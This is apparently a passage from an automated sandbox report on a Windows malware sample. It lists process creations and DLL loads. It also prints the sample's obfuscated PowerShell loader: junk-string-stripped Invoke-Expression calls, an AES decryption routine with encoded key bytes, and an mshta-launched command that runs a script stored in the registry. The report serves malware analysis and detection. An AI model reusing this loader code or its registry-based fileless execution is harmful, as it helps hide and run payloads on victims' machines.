'RzW$RzWGRzWwRzW1RzWMRzWHRzW=RzW[RzWBRzWiRzWtRzWCRzWoRzWnRzWvRzWeRzWrRzWtRzWeRzWrRzW]RzW:RzW:RzWTRzWoRzWIRzWnRzWtRzW3RzW2RzW(RzW$RzWMRzWyRzWDRzWKRzWVRzW,RzW0RzW)RzW;RzW'.Replace('RzW', ''); return $Gw1MH; } $MXyPq = IrUjV(0x74, 0x52, 107, 88, 67, 54, 106, 0x2b, 0x34, 90, 0x6f, 82, 0x59, 0x62, 0x79, 0x47, 0x70, 111, 77, 69, 117, 0x6b, 0x6b, 0x43, 89, 0x46, 0x42, 81, 0x34, 47, 70, 121, 0x64, 0x34, 0x58, 79, 0x4b, 0x4e, 0x58, 120, 0x2b, 69, 103, 61); $lsxMg = IrUjV(0x4e, 0x47, 48, 82, 99, 80, 55, 0x49, 0x36, 122, 0x75, 69, 0x65, 0x65, 0x6f, 0x32, 0x46, 111, 119, 114, 52, 0x51, 0x3d, 0x3d); $gYqop = IrUjV(0x53, 0x6f, 102, 116, 119, 97, 114, 0x65, 0x5c, 77, 0x69, 99, 0x72, 0x6f, 0x73, 0x6f, 0x66, 116, 92, 87, 105, 0x6e, 0x64, 0x6f, 119, 0x73); $QR3m4 = IrUjV(0x4a, 0x6d, 106, 53, 121); $Q21ag = IrUjV(0x67, 0x69, 69, 99, 67); $u2Okr = SsYTA(0x00, 0, 0, 0x00); $dXs3R = $true; $gnS0E = $null; function juypb($gsleS) {Invoke-Expression -Debug -WarningAction Inquire 'Fs5$Fs5wFs5GFs52Fs5gFs5lFs5=Fs5[Fs5SFs5yFs5sFs5tFs5eFs5mFs5.Fs5SFs5eFs5cFs5uFs5rFs5iFs5tFs5yFs5.Fs5CFs5rFs5yFs5pFs5tFs5oFs5gFs5rFs5aFs5pFs5hFs5yFs5.Fs5AFs5eFs5sFs5]Fs5:Fs5:Fs5CFs5rFs5eFs5aFs5tFs5eFs5(Fs5)Fs5'.Replace('Fs5', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug -Verbose 'hta$htawhtaGhta2htaghtalhta.htaMhtaohtadhtaehta=hta[htaShtayhtashtathtaehtamhta.htaShtaehtachtauhtarhtaihtathtayhta.htaChtarhtayhtaphtathtaohtaghtarhtaahtaphtahhtayhta.htaChtaihtaphtahhtaehtarhtaMhtaohtadhtaehta]hta:hta:htaChtaBhtaChta'.Replace('hta', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire 'RLY$RLYwRLYGRLY2RLYgRLYlRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLY=RLY[RLYSRLYyRLYsRLYtRLYeRLYmRLY.RLYSRLYeRLYcRLYuRLYrRLYiRLYtRLYyRLY.RLYCRLYrRLYyRLYpRLYtRLYoRLYgRLYrRLYaRLYpRLYhRLYyRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLYMRLYoRLYdRLYeRLY]RLY:RLY:RLYPRLYKRLYCRLYSRLY7RLY'.Replace('RLY', ''); Invoke-Expression -WarningAction Inquire -Verbose 'MnG$MnGwMnGGMnG2MnGgMnGlMnG.MnGKMnGeMnGyMnG=MnG[MnGSMnGyMnGsMnGtMnGeMnGmMnG.MnGCMnGoMnGnMnGvMnGeMnGrMnGtMnG]MnG:MnG:MnGFMnGrMnGoMnGmMnGBMnGaMnGsMnGeMnG6MnG4MnGSMnGtMnGrMnGiMnGnMnGgMnG(MnG$MnGMMnGXMnGyMnGPMnGqMnG)MnG'.Replace('MnG', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire 'BNK$BNKwBNKGBNK2BNKgBNKlBNK.BNKIBNKVBNK=BNK[BNKSBNKyBNKsBNKtBNKeBNKmBNK.BNKCBNKoBNKnBNKvBNKeBNKrBNKtBNK]BNK:BNK:BNKFBNKrBNKoBNKmBNKBBNKaBNKsBNKeBNK6BNK4BNKSBNKtBNKrBNKiBNKnBNKgBNK(BNK$BNKlJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; } function tiw6l([byte[]]$ZUv5N) {Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore 'DTC$DTCqDTCKDTCaDTCGDTCiDTC=DTC[DTCBDTCiDTCtDTCCDTCoDTCnDTCvDTCeDTCrDTCtDTCeDTCrDTC]DTC:DTC:DTCTDTCoDTCIDTCnDTCtDTC3DTC2DTC(DTC$DTCZDTCUDTCvDTC5DTCNDTC,DTC0DTC)DTC;DTC'.Replace('DTC', ''); return $qKaGi; } $H2oUx = iT93g(0x74<#AgF8G#>,0x52<#sotVh#>,0x6B<#IJTfo#>,0x58<#aq0EZ#>,0x43<#lRyb0#>,0x36<#LDjCA#>,0x6A<#DRhTQ#>,0x2B<#Nxos5#>,0x34<#AjnVW#>,0x5A<#vkssP#>,0x6F<#Nr7dJ#>,0x52<#lsoI1#>,0x59<#pErVd#>,0x62<#tlAPZ#>,0x79<#kBIJZ#>,0x47<#HncF5#>,0x70<#hU1xu#>,0x6F<#TUEJh#>,0x4D<#cJg0H#>,0x45<#w2R2e#>,0x75<#QkdTi#>,0x6B<#LjyD9#>,0x6B<#EPiNN#>,0x43<#YN4lF#>,0x59<#bh0r2#>,0x46<#bfRBe#>,0x42<#OWjkm#>,0x51<#D0iPg#>,0x34<#pgAJc#>,0x2F<#OkTmn#>,0x46<#k7qw7#>,0x79<#ntwbA#>,0x64<#lRwjs#>,0x34<#lp8kK#>,0x58<#gppFR#>,0x4F<#zhqOk#>,0x4B<#xLpYw#>,0x4E<#Qpxm0#>,0x58<#QDHOx#>,0x78<#bubbt#>,0x2B<#gmscA#>,0x45<#CSle7#>,0x67<#LDi0E#>,0x3D<#bmXwZ#>); $qBAgs = iT93g(0x4E<#C2Vu0#>,0x47<#diaRv#>,0x30<#MGPf7#>,0x52<#QdMXt#>,0x63<#AESom#>,0x50<#NfQKQ#>,0x37<#uWoBq#>,0x49<#mQ8mb#>,0x36<#Z2Tts#>,0x7A<#GxC3u#>,0x75<#DZACY#>,0x45<#yjqHj#>,0x65<#DRQB2#>,0x65<#tbNzN#>,0x6F<#Cek6P#>,0x32<#Hvj6e#>,0x46<#YcXZM#>,0x6F<#YWlmr#>,0x77<#Ik0CX#>,0x72<#KlS1z#>,0x34<#jkNpr#>,0x51<#dzExQ#>,0x3D<#KAunG#>,0x3D<#f40yY#>); $ZXcf8 = iT93g(0x53<#b0lHD#>,0x6F<#YnhiC#>,0x66<#bdsGx#>,0x74<#tOssn#>,0x77<#hRyWf#>,0x61<#I0N5w#>,0x72<#PudcT#>,0x65<#r8GlO#>,0x5C<#wRgut#>,0x4D<#lRnzO#>,0x69<#SMHLu#>,0x63<#LCPm3#>,0x72<#galvu#>,0x6F<#oAPw7#>,0x73<#uIGer#>,0x6F<#SvDmv#>,0x66<#tMXra#>,0x74<#EnRsF#>,0x5C<#qtdsl#>,0x57<#aquA7#>,0x69<#lC02U#>,0x6E<#LGneX#>,0x64<#X9m0B#>,0x6F<#VC3Vo#>,0x77<#HtgrI#>,0x73<#IoY3L#>); $hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>); $B8Dta = tiw6l(0x00<#A7hB6#>,0x00<#O0RD9#>,0x00<#jXCyJ#>,0x00<#OM184#>); $iSxCm = tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>); $l8XQf = tiw6l(0x03<#CQs75#>,0x00<#GS7w6#>,0x00<#gTbLR#>,0x00<#o3nyw#>); $kzu3X = $null; function S2qwV($ti34n) {Invoke-Expression -Verbose -Debug -WarningAction Inquire 'Bqr$BqrEBqrLBqrpBqrtBqrFBqr=Bqr[BqrSBqryBqrsBqrtBqreBqrmBqr.BqrSBqreBqrcBqruBqrrBqriBqrtBqryBqr.BqrCBqrrBqryBqrpBqrtBqroBqrgBqrrBqraBqrpBqrhBqryBqr.BqrABqreBqrsBqr]Bqr:Bqr:BqrCBqrrBqreBqraBqrtBqreBqr(Bqr)Bqr;Bqr'.Replace('Bqr', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore 'l3m$l3mEl3mLl3mpl3mtl3mFl3m.l3mMl3mol3mdl3mel3m=l3m[l3mSl3myl3msl3mtl3mel3mml3m.l3mSl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mCl3mrl3myl3mpl3mtl3mol3mgl3mrJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')Jump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')Jump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
